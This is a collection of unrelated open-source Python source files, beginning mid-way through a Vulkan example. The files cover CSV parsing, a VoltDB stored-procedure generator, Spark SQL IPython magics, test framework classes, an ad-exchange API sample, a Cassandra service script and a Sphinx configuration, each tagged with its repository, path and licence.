enabledLayerNames = ["VK_LAYER_LUNARG_api_dump"],
enabledExtensionNames = ["VK_KHR_swapchain"]
))
dev = vk.Device()
vk.createDevice(gpu, ci, None, dev)
vk.deviceWaitIdle(dev)
queue = vk.Queue()
vk.getDeviceQueue(dev, graphicQueueIndex, 0, queue)
vk.queueWaitIdle(queue)
print "success"
# Now, we do not have anything to draw to, but it's nice to check
# whether the things work or not. Lets create a little part of a structure for creating
# a pipeline, so you can see it works.
begin = time.time()
pipeline = vk.GraphicsPipelineCreateInfo(dict(
vertexInputState = dict(
vertexBindingDescriptions = [
dict(binding = 0, stride = 24, inputRate = "VERTEX"),
],
vertexAttributeDescriptions = [
dict(binding = 0, location = 0, format = "R32G32B32_SFLOAT", offset = 0),
dict(binding = 0, location = 1, format = "R32G32B32_SFLOAT", offset = 12),
]
),
inputAssemblyState = dict(topology = "TRIANGLE_LIST"),
viewportState = dict(
viewports = [
dict(x=0, y=0, width=200, height=200, minDepth=0.0, maxDepth=1.0)
],
scissors = [
dict(offset=dict(x=0, y=0), extent=dict(width=200, height=200))
]
)
))
end = time.time()
delta = end - begin
print "took", delta, "seconds"
# True pipeline would be longer than this, but like you can see, it's rather neat.
# Note that it takes ~2ms to fill the structure here, but the pipelines aren't constructed
# in middle of rendering.
vk.destroyDevice(dev, None)
vk.destroyInstance(instance, None)
|
cheery/vkstruct
|
example.py
|
Python
|
mit
| 3,670
|
import os, types, collections
class EmptyLine(Exception) :
"""Raised when an empty or comment line is found (dealt with internally)"""
def __init__(self, lineNumber) :
message = "Empty line: #%d" % lineNumber
Exception.__init__(self, message)
self.message = message
def __str__(self) :
return self.message
def removeDuplicates(inFileName, outFileName) :
"""removes duplicated lines from a 'inFileName' CSV file, the results are witten in 'outFileName'"""
f = open(inFileName)
legend = f.readline()
data = ''
h = {}
h[legend] = 0
lines = f.readlines()
for l in lines :
if l not in h :
h[l] = 0
data += l
f.flush()
f.close()
f = open(outFileName, 'w')
f.write(legend+data)
f.flush()
f.close()
def catCSVs(folder, ouputFileName, removeDups = False) :
"""Concatenates all csv in 'folder' and wites the results in 'ouputFileName'. My not work on non Unix systems"""
strCmd = r"""cat %s/*.csv > %s""" %(folder, ouputFileName)
os.system(strCmd)
if removeDups :
removeDuplicates(ouputFileName, ouputFileName)
def joinCSVs(csvFilePaths, column, ouputFileName, separator = ',') :
"""csvFilePaths should be an iterable. Joins all CSVs according to the values in the column 'column'. Write the results in a new file 'ouputFileName' """
res = ''
legend = []
csvs = []
for f in csvFilePaths :
c = CSVFile()
c.parse(f)
csvs.append(c)
legend.append(separator.join(list(c.legend.keys())))
legend = separator.join(legend)
lines = []
for i in range(len(csvs[0])) :
val = csvs[0].get(i, column)
line = separator.join(csvs[0][i])
for c in csvs[1:] :
for j in range(len(c)) :
if val == c.get(j, column) :
line += separator + separator.join(c[j])
lines.append( line )
res = legend + '\n' + '\n'.join(lines)
f = open(ouputFileName, 'w')
f.write(res)
f.flush()
f.close()
return res
class CSVEntry(object) :
"""A single entry in a CSV file"""
def __init__(self, csvFile, lineNumber = None) :
self.csvFile = csvFile
self.data = []
if lineNumber != None :
self.lineNumber = lineNumber
tmpL = csvFile.lines[lineNumber].replace('\r', '\n').replace('\n', '')
if len(tmpL) == 0 or tmpL[0] in ["#", "\r", "\n", csvFile.lineSeparator] :
raise EmptyLine(lineNumber)
tmpData = tmpL.split(csvFile.separator)
# tmpDatum = []
i = 0
while i < len(tmpData) :
# for d in tmpData :
d = tmpData[i]
sd = d.strip()
if len(sd) > 0 and sd[0] == csvFile.stringSeparator :
more = []
for i in range(i, len(tmpData)) :
more.append(tmpData[i])
i+=1
if more[-1][-1] == csvFile.stringSeparator :
break
self.data.append(",".join(more)[1:-1])
# if len(tmpDatum) > 0 or (len(sd) > 0 and sd[0] == csvFile.stringSeparator) :
# tmpDatum.append(sd)
# if len(sd) > 0 and sd[-1] == csvFile.stringSeparator :
# self.data.append(csvFile.separator.join(tmpDatum))
# tmpDatum = []
else :
self.data.append(sd)
i += 1
else :
self.lineNumber = len(csvFile)
for i in range(len(self.csvFile.legend)) :
self.data.append('')
def commit(self) :
"""commits the line so it is added to a file stream"""
self.csvFile.commitLine(self)
def __iter__(self) :
self.currentField = -1
return self
def __next__(self) :
self.currentField += 1
if self.currentField >= len(self.csvFile.legend) :
raise StopIteration
k = list(self.csvFile.legend.keys())[self.currentField]
v = self.data[self.currentField]
return k, v
def __getitem__(self, key) :
"""Returns the value of field 'key'"""
try :
indice = self.csvFile.legend[key.lower()]
except KeyError :
raise KeyError("CSV File has no column: '%s'" % key)
return self.data[indice]
def __setitem__(self, key, value) :
"""Sets the value of field 'key' to 'value' """
try :
field = self.csvFile.legend[key.lower()]
except KeyError :
self.csvFile.addField(key)
field = self.csvFile.legend[key.lower()]
self.data.append(str(value))
else :
try:
self.data[field] = str(value)
except Exception as e:
for i in range(field-len(self.data)+1) :
self.data.append("")
self.data[field] = str(value)
def toStr(self) :
return self.csvFile.separator.join(self.data)
def __repr__(self) :
r = {}
for k, v in self.csvFile.legend.items() :
r[k] = self.data[v]
return "<line %d: %s>" %(self.lineNumber, str(r))
def __str__(self) :
return repr(self)
class CSVFile(object) :
"""
Represents a whole CSV file::
#reading
f = CSVFile()
f.parse('hop.csv')
for line in f :
print(line['ref'])
#writing, legend can either be a list of a dict {field : column number}
f = CSVFile(legend = ['name', 'email'])
l = f.newLine()
l['name'] = 'toto'
l['email'] = "hop@gmail.com"
for field, value in l :
print(field, value)
f.save('myCSV.csv')
"""
def __init__(self, legend = [], separator = ',', lineSeparator = '\n') :
self.legend = collections.OrderedDict()
for i in range(len(legend)) :
if legend[i].lower() in self.legend :
raise ValueError("%s is already in the legend" % legend[i].lower())
self.legend[legend[i].lower()] = i
self.strLegend = separator.join(legend)
self.filename = ""
self.lines = []
self.separator = separator
self.lineSeparator = lineSeparator
self.currentPos = -1
self.streamFile = None
self.writeRate = None
self.streamBuffer = None
self.keepInMemory = True
def addField(self, field) :
"""add a filed to the legend"""
if field.lower() in self.legend :
raise ValueError("%s is already in the legend" % field.lower())
self.legend[field.lower()] = len(self.legend)
if len(self.strLegend) > 0 :
self.strLegend += self.separator + field
else :
self.strLegend += field
def parse(self, filePath, skipLines=0, separator = ',', stringSeparator = '"', lineSeparator = '\n') :
"""Loads a CSV file"""
self.filename = filePath
f = open(filePath)
if lineSeparator == '\n' :
lines = f.readlines()
else :
lines = f.read().split(lineSeparator)
f.flush()
f.close()
lines = lines[skipLines:]
self.lines = []
self.comments = []
for l in lines :
if len(l) != 0 and l[0] != "#" :
self.lines.append(l)
elif l[0] == "#" :
self.comments.append(l)
self.separator = separator
self.lineSeparator = lineSeparator
self.stringSeparator = stringSeparator
self.legend = collections.OrderedDict()
i = 0
for c in self.lines[0].lower().replace(stringSeparator, '').split(separator) :
legendElement = c.strip()
if legendElement not in self.legend :
self.legend[legendElement] = i
i+=1
self.strLegend = self.lines[0].replace('\r', '\n').replace('\n', '')
self.lines = self.lines[1:]
# sk = skipLines+1
# for l in self.lines :
# if l[0] == "#" :
# sk += 1
# else :
# break
# self.header = self.lines[:sk]
# self.lines = self.lines[sk:]
def streamToFile(self, filename, keepInMemory = False, writeRate = 1) :
"""Starts a stream to a file. Every line must be committed (l.commit()) to be appended in to the file.
If keepInMemory is set to True, the parser will keep a version of the whole CSV in memory, writeRate is the number
of lines that must be committed before an automatic save is triggered.
"""
if len(self.legend) < 1 :
raise ValueError("There's no legend defined")
try :
os.remove(filename)
except :
pass
self.streamFile = open(filename, "a")
self.writeRate = writeRate
self.streamBuffer = []
self.keepInMemory = keepInMemory
self.streamFile.write(self.strLegend + "\n")
def commitLine(self, line) :
"""Commits a line making it ready to be streamed to a file and saves the current buffer if needed. If no stream is active, raises a ValueError"""
if self.streamBuffer is None :
raise ValueError("Commit lines is only for when you are streaming to a file")
self.streamBuffer.append(line)
if len(self.streamBuffer) % self.writeRate == 0 :
for i in range(len(self.streamBuffer)) :
self.streamBuffer[i] = str(self.streamBuffer[i])
self.streamFile.write("%s\n" % ('\n'.join(self.streamBuffer)))
self.streamFile.flush()
self.streamBuffer = []
def closeStreamToFile(self) :
"""Appends the remaining commited lines and closes the stream. If no stream is active, raises a ValueError"""
if self.streamBuffer is None :
raise ValueError("Commit lines is only for when you are streaming to a file")
for i in range(len(self.streamBuffer)) :
self.streamBuffer[i] = str(self.streamBuffer[i])
self.streamFile.write('\n'.join(self.streamBuffer))
self.streamFile.close()
self.streamFile = None
self.writeRate = None
self.streamBuffer = None
self.keepInMemory = True
def _developLine(self, line) :
stop = False
while not stop :
try :
if self.lines[line].__class__ is not CSVEntry :
devL = CSVEntry(self, line)
stop = True
else :
devL = self.lines[line]
stop = True
except EmptyLine as e :
del(self.lines[line])
self.lines[line] = devL
def get(self, line, key) :
self._developLine(line)
return self.lines[line][key]
def set(self, line, key, val) :
self._developLine(line)
self.lines[line][key] = val
def newLine(self) :
"""Appends an empty line at the end of the CSV and returns it"""
l = CSVEntry(self)
if self.keepInMemory :
self.lines.append(l)
return l
def insertLine(self, i) :
"""Inserts an empty line at position i and returns it"""
self.data.insert(i, CSVEntry(self))
return self.lines[i]
def save(self, filePath) :
"""save the CSV to a file"""
self.filename = filePath
f = open(filePath, 'w')
f.write(self.toStr())
f.flush()
f.close()
def toStr(self) :
"""returns a string version of the CSV"""
s = [self.strLegend]
for l in self.lines :
s.append(l.toStr())
return self.lineSeparator.join(s)
def __iter__(self) :
self.currentPos = -1
return self
def __next__(self) :
self.currentPos += 1
if self.currentPos >= len(self) :
raise StopIteration
self._developLine(self.currentPos)
return self.lines[self.currentPos]
def __getitem__(self, line) :
try :
if self.lines[line].__class__ is not CSVEntry :
self._developLine(line)
except AttributeError :
start = line.start
if start is None :
start = 0
for l in range(len(self.lines[line])) :
self._developLine(l + start)
# start, stop = line.start, line.stop
# if start is None :
# start = 0
# if stop is None :
# stop = 0
# for l in xrange(start, stop) :
# self._developLine(l)
return self.lines[line]
def __len__(self) :
return len(self.lines)
|
tariqdaouda/pyGeno
|
pyGeno/tools/parsers/CSVTools.py
|
Python
|
apache-2.0
| 10,715
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Contains expectations."""
import inquisition
FISHY = inquisition.SPANISH
FISHY = FISHY.replace('surprise', 'haddock')
print FISHY
|
aedoler/is210-week-03-synthesizing
|
task_01.py
|
Python
|
mpl-2.0
| 183
|
from ANN_simulation import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--starting_index", type=int, default=1, help="index of starting iteration")
parser.add_argument("--num_of_iterations", type=int, default=10, help="number of iterations to run")
parser.add_argument("--starting_network_file", type=str, default=None, help="the network to start with")
parser.add_argument("--training_interval", type=int, default=1, help="training interval")
args = parser.parse_args()
if args.starting_network_file is None:
starting_network = None
else:
starting_network = autoencoder.load_from_pkl_file(args.starting_network_file)
init_iter = iteration(index = args.starting_index, network = starting_network)
a = simulation_with_ANN_main(num_of_iterations = args.num_of_iterations, initial_iteration = init_iter, training_interval=args.training_interval)
a.run_mult_iterations()
print("Done main work!")
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/main_work.py
|
Python
|
mit
| 934
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
import os
# this is deprecated sinve version 2.7
from optparse import OptionParser
import re
import subprocess
import filecmp
java_template = '''
package {%package};
import org.voltdb.*;
public class {%classname} extends VoltProcedure {
public final SQLStmt stmt = new SQLStmt("{%statement}");
public VoltTable[] run({%type_param}) {
voltQueueSQL(stmt{%parameters});
return voltExecuteSQL();
}
}
'''
#TODO: is it better to use a dictionary instead of a list?
#TODO: exception handler
volt_type = ['', # id = 0, INVALID
'', # id = 1, NULL
'', # id = 2, NUMERIC
'byte', # id = 3, TINYINT
'short', # id = 4, SMALLINT
'int', # id = 5, INTEGER
'long', # id = 6, BIGINT
'not used',
'double', # id = 8, FLOAT
'String', # id = 9, STRING
'not used',
'org.voltdb.types.TimestampType', # id = 11, TIMESTAMP
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'VoltTable', # id = 21, VOLTTABLE
'java.math.BigDecimal', # id = 22, DECIMAL
'not used',
'not used',
'byte[]', # id = 25, VARBINARY
]
def generate_one_function(func_name, package, statement, param_types, is_array, output_file):
rv = java_template.replace('{%package}', package)
rv = rv.replace('{%classname}', func_name)
rv = rv.replace('{%statement}', statement)
type_param_list = []
param_list = []
for i, (pt, ia) in enumerate(zip(param_types, is_array)):
if ia:
pt += "[] "
else:
pt += " "
v = "param" + str(i)
type_param_list.append(pt + v)
param_list.append(v)
rv = rv.replace('{%type_param}', ", ".join(type_param_list))
if param_types:
tmp = ", " + ", ".join(param_list)
else:
tmp = ""
rv = rv.replace('{%parameters}', tmp)
f = open(output_file, "w")
f.write(rv)
f.close()
def extract_a_procedure(f):
line = f.next()
func_name = line.strip().split()[-1].strip("\"")
line = f.next() #readonly
line = f.next()
# TODO: use it somewhere?
single_part = True if line.strip().split()[-1] == "true" else False
while line.startswith('set'):
line = f.next()
# sql statement
line = f.next()
statement = line.split("sqltext")[-1].strip()
statement = statement.strip("\"")
statement = statement.replace("\"", "\\\"")
statement = ' '.join(statement.split())
while line.startswith('set'):
line = f.next()
# get the type of each parameter
param_types = []
is_array = []
while line.startswith('add /clusters[cluster]/databases[database]/procedures[' + func_name + ']/statements[sql] parameters'):
f.next()
line = f.next()
param_types.append(volt_type[int(line.strip().split()[-1])])
line = f.next().strip().split()[-1] # isarray
is_array.append(True if line == "true" else False)
f.next()
f.next()
line = f.next()
# java doesn't permit file name has '.'.
func_name = func_name.replace('.', '_')
# because it is hard to go back to the previous line, we need to store the current line
return func_name, statement, param_types, is_array, line
def find_a_procedure(f, func_name = "", cur_line = ""):
target = "add /clusters[cluster]/databases[database] procedures " + func_name
if cur_line.startswith(target):
return extract_a_procedure(f)
# start to search target from the next line
for line in f:
if line.startswith(target):
return extract_a_procedure(f)
return None, None, None, None, None
def process_spec_func(func_name, package, input_file, output_dir):
f = open(input_file)
name, statement, param_types, is_array, line = find_a_procedure(f, func_name, "")
f.close()
if name:
generate_one_function(name, package, statement, param_types, is_array, output_dir + '/' + name + '.java')
else:
print "ERROR: couldn't find " + func_name
def process_whole_ddl(package, input_file, output_dir):
f = open(input_file)
line = ""
while True:
name, statement, param_types, is_array, line = find_a_procedure(f, cur_line = line)
if not name:
break
generate_one_function(name, package, statement, param_types, is_array, output_dir + '/' + name + '.java')
f.close()
def self_test():
ddl = '''
CREATE TABLE P1 (
ID INTEGER DEFAULT '0' NOT NULL,
BIG BIGINT,
RATIO FLOAT,
TM TIMESTAMP DEFAULT '2014-12-31',
VAR VARCHAR(300),
DEC DECIMAL,
PRIMARY KEY (ID)
);
PARTITION TABLE P1 ON COLUMN ID;
CREATE PROCEDURE Test AS SELECT ID, TM, VAR FROM P1 WHERE TM < ? AND ID > ?;
'''
subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
subprocess.check_call("mkdir -p /tmp/tempGenJavaSPTool".split())
# change working directory
os.chdir("/tmp/tempGenJavaSPTool")
# compile ddl
f = open("/tmp/tempGenJavaSPTool/ddl.sql", "w")
f.write(ddl)
f.close()
subprocess.check_call("voltdb compile ddl.sql".split())
if not os.path.exists("catalog.jar"):
print "cannot generate catalog.jar"
sys.exit(-1)
# generate sp
subprocess.check_call(("unzip catalog.jar catalog.txt -d /tmp/tempGenJavaSPTool").split())
process_spec_func("Test", "package", "catalog.txt", "./")
# compare
if not os.path.exists("Test.java"):
print "cannot generate java file"
sys.exit(-1)
golden = '''
package package;
import org.voltdb.*;
public class Test extends VoltProcedure {
public final SQLStmt stmt = new SQLStmt("SELECT ID, TM, VAR FROM P1 WHERE TM < ? AND ID > ?;");
public VoltTable[] run(org.voltdb.types.TimestampType param0, int param1) {
voltQueueSQL(stmt, param0, param1);
return voltExecuteSQL();
}
}
'''
f = open("/tmp/tempGenJavaSPTool/golden.java", "w")
f.write(golden)
f.close()
if filecmp.cmp('golden.java', 'Test.java'):
print "generated our expected java file"
rv = 0
else:
print "generated file is different from our expectation"
rv = -1
subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
sys.exit(rv)
def main():
opts, args = parse_cmd()
if opts.self_test:
self_test()
if len(args) != 1:
print "ERROR can only handle one ddl"
sys.exit(-1)
if args[0].endswith(".jar"):
subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
subprocess.check_call("mkdir -p /tmp/tempGenJavaSPTool".split())
subprocess.check_call(("unzip " + args[0] + " catalog.txt -d /tmp/tempGenJavaSPTool").split())
input_file = "/tmp/tempGenJavaSPTool/catalog.txt"
else:
input_file = args[0]
try:
if opts.procedure:
process_spec_func(opts.procedure, opts.package, input_file, opts.target_dir)
else:
process_whole_ddl(opts.package, input_file, opts.target_dir)
if args[0].endswith(".jar"):
subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
except Exception as e:
subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
raise e
def parse_cmd():
parser = OptionParser()
parser.add_option("--target_dir", type = "string", action = "store", dest = "target_dir", default = "./")
parser.add_option("--package", type = "string", action = "store", dest = "package")
parser.add_option("--procedure", type = "string", action = "store", dest = "procedure")
parser.add_option("--self-test", action = "store_true", dest = "self_test", default = False)
return parser.parse_args()
if __name__ == "__main__":
main()
|
zheguang/voltdb
|
tools/gen_sp_from_catalog.py
|
Python
|
agpl-3.0
| 9,550
|
#
# IPython magic functions to use with Pyspark and Spark SQL
# The following code is intended as examples of shorcuts to simplify the use of SQL in pyspark
# The defined functions are:
#
# %sql <statement> - return a Spark DataFrame for lazy evaluation of the SQL
# %sql_show <statement> - run the SQL statement and show max_show_lines (50) lines
# %sql_display <statement> - run the SQL statement and display the results using a HTML table
# - this is implemented passing via Pandas and displays up to max_show_lines (50)
# %sql_explain <statement> - display the execution plan of the SQL statement
#
# Use: %<magic> for line magic or %%<magic> for cell magic.
#
# Author: Luca.Canali@cern.ch
# September 2016, updated Sep 2019
#
from IPython.core.magic import register_line_cell_magic
# Configuration parameters
max_show_lines = 50 # Limit on the number of lines to show with %sql_show and %sql_display
detailed_explain = True # Set to False if you want to see only the physical plan when running explain
@register_line_cell_magic
def sql(line, cell=None):
"Return a Spark DataFrame for lazy evaluation of the sql. Use: %sql or %%sql"
val = cell if cell is not None else line
return spark.sql(val)
@register_line_cell_magic
def sql_show(line, cell=None):
"Execute sql and show the first max_show_lines lines. Use: %sql_show or %%sql_show"
val = cell if cell is not None else line
return spark.sql(val).show(max_show_lines)
@register_line_cell_magic
def sql_display(line, cell=None):
"""Execute sql and convert results to Pandas DataFrame for pretty display or further processing.
Use: %sql_display or %%sql_display"""
val = cell if cell is not None else line
return spark.sql(val).limit(max_show_lines).toPandas()
@register_line_cell_magic
def sql_explain(line, cell=None):
"Display the execution plan of the sql. Use: %sql_explain or %%sql_explain"
val = cell if cell is not None else line
return spark.sql(val).explain(detailed_explain)
|
LucaCanali/Miscellaneous
|
Pyspark_SQL_Magic_Jupyter/IPython_Pyspark_SQL_Magic.py
|
Python
|
apache-2.0
| 2,061
|
from Parser.Parser import Parser
from EmptyContext import EmptyContext
class AbstractNumberParser(Parser):
parser = None
def __init__(self, text, context):
super(AbstractNumberParser, self).__init__(text, context)
def parser_default(self):
return AbstractNumberParser.parser
@staticmethod
def default(text, context):
abstract = AbstractNumberParser.parser
return abstract(text, context)
@staticmethod
def set_parser(new_parser):
AbstractNumberParser.parser = new_parser
|
mathiasquintero/LlamaLang
|
Parser/Data/Numbers/AbstractNumberParser.py
|
Python
|
mit
| 545
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.testobjects.test_watchers import DelayedTestFailTestWatcher, \
CaptureScreenShotOnErrorTestWatcher
from wtframework.wtf.testobjects.testcase import WatchedTestCase
import inspect
class WTFBaseTest(WatchedTestCase):
'''
Test Cases can extend this test to additional unit test functionality such as
take screenshot on failure.
'''
def __init__(self, methodName='runTest', webdriver_provider=None, screenshot_util=None):
super(WTFBaseTest, self).__init__(methodName)
self._register_watcher(CaptureScreenShotOnErrorTestWatcher(webdriver_provider, screenshot_util))
# Note this watcher should be registered after all other watchers that use
# on_test_passed() event.
self._delayed_test_watcher = DelayedTestFailTestWatcher()
self._register_watcher(self._delayed_test_watcher)
def assertWithDelayedFailure(self, assert_method, *args, **kwargs):
"""
Cause an assertion failure to be delayed till the end of the test.
Usage:
self.assertWithDelayedFailure(self.AssertEquals, 100, percent)
@param assert_method: Reference to assert method.
@param *params: parameters to pass into assert method.
"""
frame = None
try:
#attempt to get parent frames
frame = inspect.getouterframes(inspect.currentframe())[1]
except:
pass #oh well, we couldn't get it.
assert_func = lambda: assert_method(*args, **kwargs)
generated_exception = self._delayed_test_watcher.delay_failure(assert_func, frame)
if generated_exception:
# Call our on_fail for our test watchers. So we can trigger our screen
# capture at moment of failure.
for test_watcher in self.__wtf_test_watchers__:
test_watcher.on_test_failure(self, self._resultForDoCleanups, generated_exception)
|
LeXuZZ/localway_tests
|
wtframework/wtf/testobjects/basetests.py
|
Python
|
gpl-3.0
| 2,805
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example accepts the given proposal at the given revision."""
import argparse
import os
import pprint
import sys
sys.path.insert(0, os.path.abspath('..'))
from googleapiclient.errors import HttpError
import samples_util
DEFAULT_ACCOUNT_ID = 'INSERT_ACCOUNT_ID'
DEFAULT_PROPOSAL_ID = 'INSERT_PROPOSAL_ID'
def main(ad_exchange_buyer, account_id, proposal_id, proposal_revision):
# Construct the request body.
body = {'proposalRevision': proposal_revision}
try:
# Construct and execute the request.
response = ad_exchange_buyer.accounts().proposals().accept(
accountId=account_id, proposalId=proposal_id, body=body).execute()
print(f'Successfully accepted proposal with ID "{proposal_id}":')
pprint.pprint(response)
except HttpError as e:
print(e)
if __name__ == '__main__':
# For optional arguments, default values are overridden if set.
parser = argparse.ArgumentParser(description='Accepts the given proposal.')
parser.add_argument('-a', '--account_id', required=False, type=int,
default=DEFAULT_ACCOUNT_ID,
help=('The integer id of the account you\'re using to '
'create the proposal.'))
parser.add_argument('-i', '--proposal_id', required=False,
default=DEFAULT_PROPOSAL_ID,
help=('The ID of the proposal to be accepted.'))
parser.add_argument('-r', '--proposal_revision', required=True, type=int,
help=('The integer revision of the proposal being '
'accepted. This is a required field.'))
args = parser.parse_args()
try:
service = samples_util.GetService('v2beta1')
except IOError as ex:
print(f'Unable to create adexchangebuyer service - {ex}')
print('Did you specify the key file in samples_util.py?')
sys.exit(1)
main(service, args.account_id, args.proposal_id, args.proposal_revision)
|
googleads/googleads-adxbuyer-examples
|
python/samples/v2_x/accept_proposal.py
|
Python
|
apache-2.0
| 2,543
|
import os.path
from resource_management.core.resources.system import File, Execute
import yaml
# pylint: disable=unused-argument
class Cassandra(object):
def configure(self, env):
import params
File(os.path.join(params.cassandra_conf_dir, 'cassandra.yaml'),
content=yaml.safe_dump(params.cassandra_configs),
mode=0644,
owner=params.cassandra_user)
def start(self, env):
Execute(('service', 'cassandra', 'start'))
def stop(self, env):
Execute(('service', 'cassandra', 'stop'))
def status(self, env):
Execute(('service', 'cassandra', 'status'))
|
jimbobhickville/ambari-cassandra-service
|
package/scripts/cassandra.py
|
Python
|
apache-2.0
| 644
|
# -*- coding: utf-8 -*-
#
# Amazon Distributed Runner documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 26 13:54:46 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../adr'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.napoleon',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Amazon Distributed Runner'
copyright = u'2016, Bas Hoonhout'
author = u'Bas Hoonhout'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
